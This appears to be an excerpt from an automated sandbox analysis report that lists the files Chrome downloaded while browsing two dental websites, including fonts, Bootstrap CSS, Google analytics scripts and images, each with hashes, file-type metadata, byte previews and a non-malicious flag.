                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Apr 24 09:12:27 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2679
                                                                                                                                      Entropy (8bit):4.003531839191478
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:8fdFTNROHoidAKZdA1duTeehOuTbbiZUk5OjqehOuTbsy+yT+:8HHaTfTbxWOvTbsy7T
                                                                                                                                      MD5:1F889DBE061E4F1751B0DF3F704F3F82
                                                                                                                                      SHA1:2A298C5C5D73200BAA57D285FFC1F064C06DE464
                                                                                                                                      SHA-256:F066271E02969FA55EC0CFE1EFA0FBBFE7FD5E0D7D498D23B02058269EC23423
                                                                                                                                      SHA-512:88956C141F1CADE0EB1B1D4B2136CBBF03D101AA79936FA22D59934BACA2BDF89F105C5ED26EBA437E7FDF2C7A3B92487B0B61B94DCF42DB1730086D858380E9
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      Preview:L..................F.@.. ...$+.,....p{../...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X.Q....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.Q....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.Q....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.Q..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.Q...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........S|GI.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:Web Open Font Format (Version 2), TrueType, length 19988, version 1.0
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):19988
                                                                                                                                      Entropy (8bit):7.9883896841342
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:F9kGr9Ir+p3NCU3+iTuedR8R/9ndQzpcWPHXl7gvozKmJ2VGPdQdIvTtm:F3r9Ioh3+iTut3nd2ei3MozKmJ1GB
                                                                                                                                      MD5:2C8AF763179C95B841A99A9ABD002445
                                                                                                                                      SHA1:F1D1EC64AB1B56BEF7E1EB499D83B3132D628175
                                                                                                                                      SHA-256:95D944EFA53BFCA3A696C8085DA82C14987FCADE92426C0BCA589863DC0A8DB9
                                                                                                                                      SHA-512:6EF26798858D0102F7A14CFFD27268C741E2D5F67BAC60E736819FDD4484AAE8CDDDD0AB99396F947BEA8F037A19E995778AAE2B490515A9A3EA445AED348682
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://fonts.gstatic.com/s/librefranklin/v14/jizDREVItHgc8qDIbSTKq4XkRiUR2zcLig.woff2
                                                                                                                                      Preview:wOF2......N........T..M...........................M......?HVAR.v.`?STAT..'2..t/~.....D.U..F.0.J.6.$.... ..P..g...?...6.y`..T{{I<.!l....g...4.?....dc.:.v..jk.._..<..D..dE...}.g"XF.\.......O'z.VQ..3A...AA.R.0.0+(....-.}.-_*)).C.B..4..}........"n..^.k....ZL.....;..v...kM..Md....h..E%UR%._.V..x..Gt...<\.U.&...T..q..uf^.h....'.$.!...P1...W<.S.b....9..;..#...I.q..$.F..\k..L..-.x..V.z...kg..~......G..........."M.L..-...U}?m.'!..1V!P.C...3.n..b.V.3.I......3..X..g.......c:!Z.d.R.^...,ON.6...0.HQ.....OM..|.B.'.\...+6...G3z....=;.../.j.I...P z.../...`..'.....p.@(...y....wk...xL.;..D..A.L...%q~j.v..B.@..n.g.F4v..6.-).D.Z..-\.WD~g.U...YUO..'.m.Y'.0{.s.>......."....[...(T.9.....|......4..........-.K../z.P.%,.m.V.........-....~;..*1.8]4TK.V...F..U,...Z..;..#.D...u......=.@....s..o.+........+s...x..~o..b...nL.52D.!&..T.....%..i%......w)..8.s.b.n1;..b.Z.... ..H....%..e..A.$.S.D....:w1.n:w*j.}.]....O-...V.,....H..j.B.@.+o...j..eFr......Jk0.C..V...Mi...........%..>.
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:ASCII text, with very long lines (65320)
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):124962
                                                                                                                                      Entropy (8bit):5.020700443955613
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:bcEBu1SoWXcwQ7c6DEBi8aNcuSE0mjVyzAqhqczDsIltSQV81IA1C8rkFnM5SXfI:bcEB2i0yzAqhqczDsIsalOEMH2UtV
                                                                                                                                      MD5:3FFBAB350748E841D3768B5D1CA48933
                                                                                                                                      SHA1:262E04CAB3C1A51024D4F3960C72EBD3968476A7
                                                                                                                                      SHA-256:9BF87F7140C085FEBF881462C536EE73CF9183670811342D3DC1FD0F7A762A0D
                                                                                                                                      SHA-512:A19C8F4A6A0A19FB0BAC451AA3FB5F8CF6AFA3EF53164033CEF8BDBFFFD74462ED1647B4B05D93AC0C77A79B1469548FBAF9A3ECD89D82A433395D657D4E71FA
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0-beta/css/bootstrap.min.css
                                                                                                                                      Preview:/*!. * Bootstrap v4.0.0-beta (https://getbootstrap.com). * Copyright 2011-2017 The Bootstrap Authors. * Copyright 2011-2017 Twitter, Inc.. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */@media print{*,::after,::before{text-shadow:none!important;box-shadow:none!important}a,a:visited{text-decoration:underline}abbr[title]::after{content:" (" attr(title) ")"}pre{white-space:pre-wrap!important}blockquote,pre{border:1px solid #999;page-break-inside:avoid}thead{display:table-header-group}img,tr{page-break-inside:avoid}h2,h3,p{orphans:3;widows:3}h2,h3{page-break-after:avoid}.navbar{display:none}.badge{border:1px solid #000}.table{border-collapse:collapse!important}.table td,.table th{background-color:#fff!important}.table-bordered td,.table-bordered th{border:1px solid #ddd!important}}html{box-sizing:border-box;font-family:sans-serif;line-height:1.15;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%;-ms-overflow-style:scrollbar;-webkit-tap-highlight-color
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:ASCII text, with very long lines (3034)
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):270327
                                                                                                                                      Entropy (8bit):5.564647962911272
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:KvlgghzgNSNow8VNz3t1d8771+TYc20DCSY1KGoub1QgD4tL+aVsQCtfXmN8LMjL:k/hewMNz3QqSJD4tLfV9Ctf2N8aAU
                                                                                                                                      MD5:7B88FCC45E8F17C26A5E1B836CA290E1
                                                                                                                                      SHA1:9C16B5795740D6621BCCA90DADB90DE8AA5BCE95
                                                                                                                                      SHA-256:E8365CA29978C74C046001A32013D6E49F8D286FC51541A4F5534585B236C7AF
                                                                                                                                      SHA-512:7CAF7BFC237CC9CD6D4F0876FF00B0BB43511DF9D792F13E52BABF6BFD82792ED2CC7680C9FA547260E8ACF72083E45DDD8DA8E4E77FD63E6A1664F7D549B751
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://www.googletagmanager.com/gtag/js?id=G-XW48SKHQ61&l=dataLayer&cx=c
                                                                                                                                      Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"},{"vtp_signal":0,"function":"__c","vtp_value":0},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0},{"vtp_signal":0,"function":"__c","vtp_value":0}],. "tags":[{"function":"__gct","vtp_trackingId":"G-XW48SKHQ61","vtp_sessionDuration":0,"vtp_googleSignals":["macro",1],"vtp_foreignTld":["macro",2],"vtp_restrictDomain":["macro",3],"vtp_eventSettings":["map"],"tag_id":7},{"function":"__set_product_settings","vtp_instanceDestinationId":"G-XW48SKHQ61","vtp_foreignTldMacroResult":["macro",4],"vtp_isChinaVipRegionMacroResult":["macro",5],"tag_id":9},{"function":"__ogt_google_signals","vtp_googleSignals":"DISABLED","vtp_instanceDestinationId":"G-XW48SKHQ61","vtp_serverMacroResult":["macro",6],"tag_id":11},{"function":"__ccd_ga_regscope","vtp_settingsTable":["list",["map"
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:PNG image data, 24 x 35, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):186
                                                                                                                                      Entropy (8bit):6.45320484917588
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:yionv//thPlAtr5zQJtd83pa9nGOkzh1B1EWh0u6AujZoKKFuD+iDgCbumrqsS9A:6v/lhP+1QJtd8cFGHh1B1b6LOKeMTDgs
                                                                                                                                      MD5:94742EF654B7D3D7CC4062C8C74C78DA
                                                                                                                                      SHA1:401D000FFB9D550AFCD297ED2A892968AF262A5F
                                                                                                                                      SHA-256:3CF06FE81204A9C1A550F70AFCA3574327CEF86E038BF87F7917453781300520
                                                                                                                                      SHA-512:BFFE70BCA00D09C7DC34AEACFF2EEBB27AD119F2495E75ACFA18B39C551C2EDF42650CFAE8ED45361D2D639753EEEB9F985A45D086CBBD1E4E5A748CCB9D59B1
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      Preview:.PNG........IHDR.......#............IDATx.c...?.-1..@@/d!....n..2v...Y........e.Pa=.)h.Q. .;.n..X".5.....P..`$...$"q..K....Z0.,.......(..f....@%!..S..#Y.....e....-V....IEND.B`.
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:ASCII text, with very long lines (2343)
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):52916
                                                                                                                                      Entropy (8bit):5.51283890397623
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:oHzaMKHBCwsZtisP5XqYofL+qviHOlTjdNoVJDe6VyKaqgYUD0ZTTE8yVfZsk:caMKH125hYiM8O9dNoVJ3N48yVL
                                                                                                                                      MD5:575B5480531DA4D14E7453E2016FE0BC
                                                                                                                                      SHA1:E5C5F3134FE29E60B591C87EA85951F0AEA36EE1
                                                                                                                                      SHA-256:DE36E50194320A7D3EF1ACE9BD34A875A8BD458B253C061979DD628E9BF49AFD
                                                                                                                                      SHA-512:174E48F4FB2A7E7A0BE1E16564F9ED2D0BBCC8B4AF18CB89AD49CF42B1C3894C8F8E29CE673BC5D9BC8552F88D1D47294EE0E216402566A3F446F04ACA24857A
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://www.google-analytics.com/analytics.js
                                                                                                                                      Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var n=this||self,p=function(a,b){a=a.split(".");var c=n;a[0]in c||"undefined"==typeof c.execScript||c.execScript("var "+a[0]);for(var d;a.length&&(d=a.shift());)a.length||void 0===b?c=c[d]&&c[d]!==Object.prototype[d]?c[d]:c[d]={}:c[d]=b};function q(){for(var a=r,b={},c=0;c<a.length;++c)b[a[c]]=c;return b}function u(){var a="ABCDEFGHIJKLMNOPQRSTUVWXYZ";a+=a.toLowerCase()+"0123456789-_";return a+"."}var r,v;.function aa(a){function b(k){for(;d<a.length;){var m=a.charAt(d++),l=v[m];if(null!=l)return l;if(!/^[\s\xa0]*$/.test(m))throw Error("Unknown base64 encoding at char: "+m);}return k}r=r||u();v=v||q();for(var c="",d=0;;){var e=b(-1),f=b(0),h=b(64),g=b(64);if(64===g&&-1===e)return c;c+=String.fromCharCode(e<<2|f>>4);64!=h&&(c+=String.fromCharCode(f<<4&240|h>>2),64!=g&&(c+=String.fromCharCode(h<<6&192|g)))}};var w={},y=function(a){w.TAGGING=w.TAGGING||[];w.TAGGING[a]=!0};var ba=Array.isArray,c
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:PNG image data, 140 x 140, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):2702
                                                                                                                                      Entropy (8bit):7.879513611280411
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:rQDRozoit9ESWlxvAZ3dYSrpi1Koosu0rzIKeGqG7H6+D1wnt:8DmlWbvABdYSrI11HneGqf+D1wnt
                                                                                                                                      MD5:66DFF8EB18FE75983D0560D9B2829B6C
                                                                                                                                      SHA1:D46111B4F027C1AF8BDECD2BFD6C564119920523
                                                                                                                                      SHA-256:2B981B9E3AC25C9BD76654DA7C084B5C31D9B0D814BD4606138A0E8B56DB4453
                                                                                                                                      SHA-512:57BB7D3A6A01ED7B49B46FEC690D9873E2635B18FC2DCC783839A26CE85D76D95985A646628A3DD6D116556EF969A6EF61AE3255BC3D73C0B2014CE322C87A34
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://dentalhealthstop.co.uk/wp-content/uploads/2017/03/reason-4.png
                                                                                                                                      Preview:.PNG........IHDR...............A>....tEXtSoftware.Adobe ImageReadyq.e<...0IDATx..].q.8..4..L.7f*0S....... J..U...9...R..*.=W.t..@.8.S.......p..2.`..~.$g..p.\........S.{v......f....A2v,.Q_...U{-.q.D).....8)Y..IRvT.8]..H.>Y..5..(I3.AU.........?. ...0.....u.k....A..Q........Cd1..|.F.9..{@..~$D..X%f...fv%.$..RpW......)......bR.4..EZ!.L....I..T.Q.....I.(.0..D.?.0..LW.D...`:.E@.....M.0....,SP...)...S...a.Q...v{.3...B.....Y......{.o..Fh.d.~2.4W..#.Z[.=%.y.a..p.l.!6.i.....Wv,.0q.!....W....#....^...g.....?.Q.K....u.v.."...f.|.....1..'N..?.U.....0..b...-._..u...j...@.!.a......Yarj;..@..^..s_.%Q.$L...e.T..D.K.-.."&.f..0...!&LF......0."....8..y.S.>.a.c..*.....c...h...9...0...a.I.^.oD..n.@H...;.F.. .D...I[...|.S.#.......|.i..^.uB........m..g..R.n..1....h.3.nI.2....a..$.....c...]..2.6/..B...}..1.6../..h.x....%.r@...1.Y...H.n.*S....%|.9.0{y.N..8T...m5.K.*#......Y..N.J..|....Td.0H....|`..b...L.....j..z......+...=.VF..,.+k..S....QV..4.E...Z..Z5Y$|.b
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1429
                                                                                                                                      Entropy (8bit):5.2294047974609565
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:t4Lxnb7Hx8G7GERsksUHx8GkGIv/qTHx8GVVGR2mHaLEfhuzH6wsGNaaWxIsrnGi:+xnHJCtUHJPpHJiR2JchuzawsGNaaWxH
                                                                                                                                      MD5:E82C3CD8C7349AB13088920527E4D317
                                                                                                                                      SHA1:100330F83AFE9649A4C8D76E3D6BF36A127BA9A5
                                                                                                                                      SHA-256:2BB1A2C9B9AE4D36F62EA53811554636CF3C5B74D9845E1DBACCA0CE62DC7880
                                                                                                                                      SHA-512:5AAE5ADBD5E452BC73C09672039BA2AA78CF6CDF5F562EC0100E73235E125680EC8801A09024AB0C30A3D81287E49FFD391DF83A30A163717E8708431134501F
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      Preview:<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 48 48" height="48" width="48"><defs><linearGradient id="a" x1="3.2173" y1="15" x2="44.7812" y2="15" gradientUnits="userSpaceOnUse"><stop offset="0" stop-color="#d93025"/><stop offset="1" stop-color="#ea4335"/></linearGradient><linearGradient id="b" x1="20.7219" y1="47.6791" x2="41.5039" y2="11.6837" gradientUnits="userSpaceOnUse"><stop offset="0" stop-color="#fcc934"/><stop offset="1" stop-color="#fbbc04"/></linearGradient><linearGradient id="c" x1="26.5981" y1="46.5015" x2="5.8161" y2="10.506" gradientUnits="userSpaceOnUse"><stop offset="0" stop-color="#1e8e3e"/><stop offset="1" stop-color="#34a853"/></linearGradient></defs><circle cx="24" cy="23.9947" r="12" style="fill:#fff"/><path d="M3.2154,36A24,24,0,1,0,12,3.2154,24,24,0,0,0,3.2154,36ZM34.3923,18A12,12,0,1,1,18,13.6077,12,12,0,0,1,34.3923,18Z" style="fill:none"/><path d="M24,12H44.7812a23.9939,23.9939,0,0,0-41.5639.0029L13.6079,30l.00
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:Web Open Font Format (Version 2), TrueType, length 128352, version 1.0
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):128352
                                                                                                                                      Entropy (8bit):7.998349465466699
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:3072:b4XkN5u3RbAR2r4lJ8FBnP7fNblbKBRvqy:fGdA8FBP7fNb5y
                                                                                                                                      MD5:53436ACA8627A49F4DEAAA44DC9E3C05
                                                                                                                                      SHA1:0BC0C675480D94EC7E8609DDA6227F88C5D08D2C
                                                                                                                                      SHA-256:8265F64786397D6B832D1CA0AAFDF149AD84E72759FFFA9F7272E91A0FB015D1
                                                                                                                                      SHA-512:6655E0426EB0C78A7CB4D4216A3AF7A6EDD50ABA8C92316608B1F79B8FC15F895CBA9314BEB7A35400228786E2A78A33E8C03322DA04E0DA94C2F109241547E8
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://fonts.gstatic.com/s/materialicons/v142/flUhRq6tzZclQEJ-Vdg-IuiaDsNc.woff2
                                                                                                                                      Preview:wOF2.......`......~....................................D.`..........,..t..X..6.$..p. ..z. [.\.M.B.....-..VT .&"..Qc.=.U..XwD...7Q.v.a.*.; (...I........+.I..%...._.v.:..N.Y....;J.V...+..S..9Z...X.J........_0)c`[vb?.".P.E..Q......."p.v..........3.Zm`k":8..Kk........UR%U2...<....'a.L.4.&....P.X...,z5.j<++....ff..X1I.......%.Z<.UT.G.)L........;.A....O~ev...-z....^.|.....pE..@.t.7...4..>...}.U[y...O8....|m.L04....t...g...../...&.E...."...q.1.(..g.&?;...Vx..|.-p=......;...a..Q|*L8..}..$.*I*.2.tI8...O..Q...k+;..N.hf.M...t..(..\...O.......:n.... v..}H...|B<..'..r...1..B, .....6.&...6.x.i.=...r......Os.._...g.{W$VD..A1........B[.<un...t......k..n0........ ..O&.....%.@..c..Tv...pT.Np...U...%j+ZP....@.....b..........~...f..D..... ...O$....|......$W842...S.....2.pIL.....Z.[.xo.r.{.d)I.P.-)0..K.`.~,.8..[...m..3d....A..v.s.d..KW..j.4.Ic.m..,.P........../W.j...>B..BJ.........[?.....$."...-...K.P.R..K.....Dz(..7_...=.....b.C...2..4F.+....P...f.#.q.G.G8.
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:PNG image data, 24 x 35, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):186
                                                                                                                                      Entropy (8bit):6.45320484917588
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:yionv//thPlAtr5zQJtd83pa9nGOkzh1B1EWh0u6AujZoKKFuD+iDgCbumrqsS9A:6v/lhP+1QJtd8cFGHh1B1b6LOKeMTDgs
                                                                                                                                      MD5:94742EF654B7D3D7CC4062C8C74C78DA
                                                                                                                                      SHA1:401D000FFB9D550AFCD297ED2A892968AF262A5F
                                                                                                                                      SHA-256:3CF06FE81204A9C1A550F70AFCA3574327CEF86E038BF87F7917453781300520
                                                                                                                                      SHA-512:BFFE70BCA00D09C7DC34AEACFF2EEBB27AD119F2495E75ACFA18B39C551C2EDF42650CFAE8ED45361D2D639753EEEB9F985A45D086CBBD1E4E5A748CCB9D59B1
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://exodontia.info/wp-content/uploads/2021/06/ExodoniaBWML.png
                                                                                                                                      Preview:.PNG........IHDR.......#............IDATx.c...?.-1..@@/d!....n..2v...Y........e.Pa=.)h.Q. .;.n..X".5.....P..`$...$"q..K....Z0.,.......(..f....@%!..S..#Y.....e....-V....IEND.B`.
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:ASCII text
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):515
                                                                                                                                      Entropy (8bit):4.419273959622532
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:zvVUdnvVjnvVFnvVUnvVMtvVUPtvVoeZYD1tYmC1NDIAVA:zCdn9nHnCn+CVQ1thC1yAVA
                                                                                                                                      MD5:1ACBF3591452AAF3746D1EA3D741BA16
                                                                                                                                      SHA1:0ADEE1267059A4A0EA4869C5BEDF1C4A94EEB698
                                                                                                                                      SHA-256:EEE51A75D3F4BF71B5D1ECE711FADF84B4FAFB8AB732724E21EBCB32A8F718E0
                                                                                                                                      SHA-512:FF409D37C7CBD4690F3D29FEB6283DAB9251DBFCD9D89417C369625173765FEFCE3EFDD56561F66B1F9288657D827F0932530C270F717CAFF685855ECE39F9EE
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://exodontia.info/wp-content/themes/themify-shoppe/styles/modules/filters/none.css?ver=5.7.0
                                                                                                                                      Preview:body .filter-hover-none img:hover,..filter-featured-only.filter-hover-none .post-image:hover,..filter-featured-only.filter-hover-none .post-img:hover,..filter-featured-only.filter-hover-none .module-feature-image:hover,..filter-featured-only.filter-hover-none .slide-image:hover,..filter-all.filter-hover-none img:hover,..filter-all.filter-hover-none .loops-wrapper article:hover img,.body.filter-all #pagewrap .format-video .post-image,.body.filter-featured-only #pagewrap .format-video .post-image{..filter:none.}
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1758x1000, components 3
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):119599
                                                                                                                                      Entropy (8bit):7.867371358434238
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:f5jT7kQ2gP12WyxEyukmu7v6yhU9Nc0ABW4BPdL1mh:+PgP1cxfukmxyhU9Nc0AB9PdL1mh
                                                                                                                                      MD5:77A09CC843F95BF6211950827B4CCC10
                                                                                                                                      SHA1:CBD1C1E1822D03628A074CE59E604B61315CD488
                                                                                                                                      SHA-256:7CF6574A4F676DF80C7BAACCEC19DA5C9FF75C6C3ECA5DB91C8BF6604AF5B6DA
                                                                                                                                      SHA-512:CC02437A6B9661B8064E66783EE07ED2C0617A0C9794E145CD1777F2C0345A22FEFDDA2C685E1060803CEE044FD24D6BD26031C41BB223E2DB822585CE61A8FA
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://dentalhealthstop.co.uk/wp-content/uploads/2017/03/home-intro.jpg
                                                                                                                                      Preview:......Exif..II*.................Ducky.......2......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:91555cef-7662-410e-a9a1-48e602076417" xmpMM:DocumentID="xmp.did:7EDAFDFE04F111E791F98894D3D78840" xmpMM:InstanceID="xmp.iid:7EDAFDFD04F111E791F98894D3D78840" xmp:CreatorTool="Adobe Photoshop CC 2017 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:f3e7a987-8ab4-4f07-8b62-5725d2b92aeb" stRef:documentID="xmp.did:91555cef-7662-410e-a9a1-48e602076417"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...........................................
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 2560x1350, components 1
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):367441
                                                                                                                                      Entropy (8bit):7.965310641430513
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:1a5QlTZfVsyKneDSeZ2aZ6wVJHQXtUD3YGyG08LW1Fult1Pv2DM:oAZNlKne+02aPTyq7YGy8LW1cvuM
                                                                                                                                      MD5:0280C5A8583B9CB44CCDFC0BE581E68A
                                                                                                                                      SHA1:FE82A13558E69C1E6667192A67B7C294184BBAE1
                                                                                                                                      SHA-256:88E78D3220554F98BB2CA2FD3C1386D0243079AB7796571C55624AE33E723BD7
                                                                                                                                      SHA-512:31A124EEA6CB73B8FBF473467BD8CAC9DBD138CB2AC2A3ADBED0F72FF321DAD45180E852CFE481CFEF6CC5C5D508B2392DC61C339DCEF0182D82F543653528A8
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://exodontia.info/wp-content/uploads/2021/06/shutterstock_1642040905-scaled.jpg
                                                                                                                                      Preview:......JFIF.....,.,.....C.....................................!........'.."#%%%..),($+!$%$......F.......................................>........................!1A.."Qa.2q.#..B...R.3b..$..r4CS..%........?..F|..O.8...b@.......2..9...|.Z.1f+......k5..|.#..........&..~.y.j....j&....)~fO..6.y...b..Q.+....=..,.........#.!.Y..+........$>....X.s9ul.,....#%....PL.r.....%rQ. ...,....?S.l.....,.&..m~F`QA"..H...(5U.QpG].y'.R..9......r.....&...v!p..;.@.1..2........;.".5.r... q .U.!&H..P.M..p....<..MQ..J..0.....p.E2......,..'.X...`I_Pgb....u...l.2S\Wq.?5.....5.x...D......_Q..P.\E5..K....5.Od..IoQ.....Er..e.X........}D.Pl..l......K..E.}J.'.y.e.U..J....h[W..>#.=.b....7..h..5............3{zt.8.~..g..wSa..........h.G.?[/.....i..3.3d............Y.6EU...../S.6..'..}..brX#.z=6..%.p.......[......$UK..(..}vp1..&6.XTmI...b...`. K'........(...gf..'U...c...oP8..l...m~B..a.=_...E..3...Q.l.0...r.2..`c.f{U..?q.8.c.k.........:.......HF..1...U_....?..F...oQ&..r.._..x....~]..mnE
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (511), with CRLF, LF line terminators
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):12883
                                                                                                                                      Entropy (8bit):5.196213076394291
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:jwyI8cetqG5obu0aGhetCL9HeBtKPenlZy4hREPOFez6bdP6:m8PqG5obu0aGheEL9ugPePvR8OFez6w
                                                                                                                                      MD5:577E5CA3534933C2F188DB5061D64471
                                                                                                                                      SHA1:C93F5E3FA5BE00910BE126C1E278B819853F4D3A
                                                                                                                                      SHA-256:85E49E50E048BA8DB7ED47837F388A7CB44C609E1D00BF0DED92EFD68F413205
                                                                                                                                      SHA-512:C22F03C6D8974C135BD2B50B20EFBE7922B82B43110DE535DE88D90E877BED6B1EACC24260B83FB6045F64A9458FF18E3721E099E743B8CF53B4BF82686D7C50
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      URL:https://dentalhealthstop.co.uk/contact/
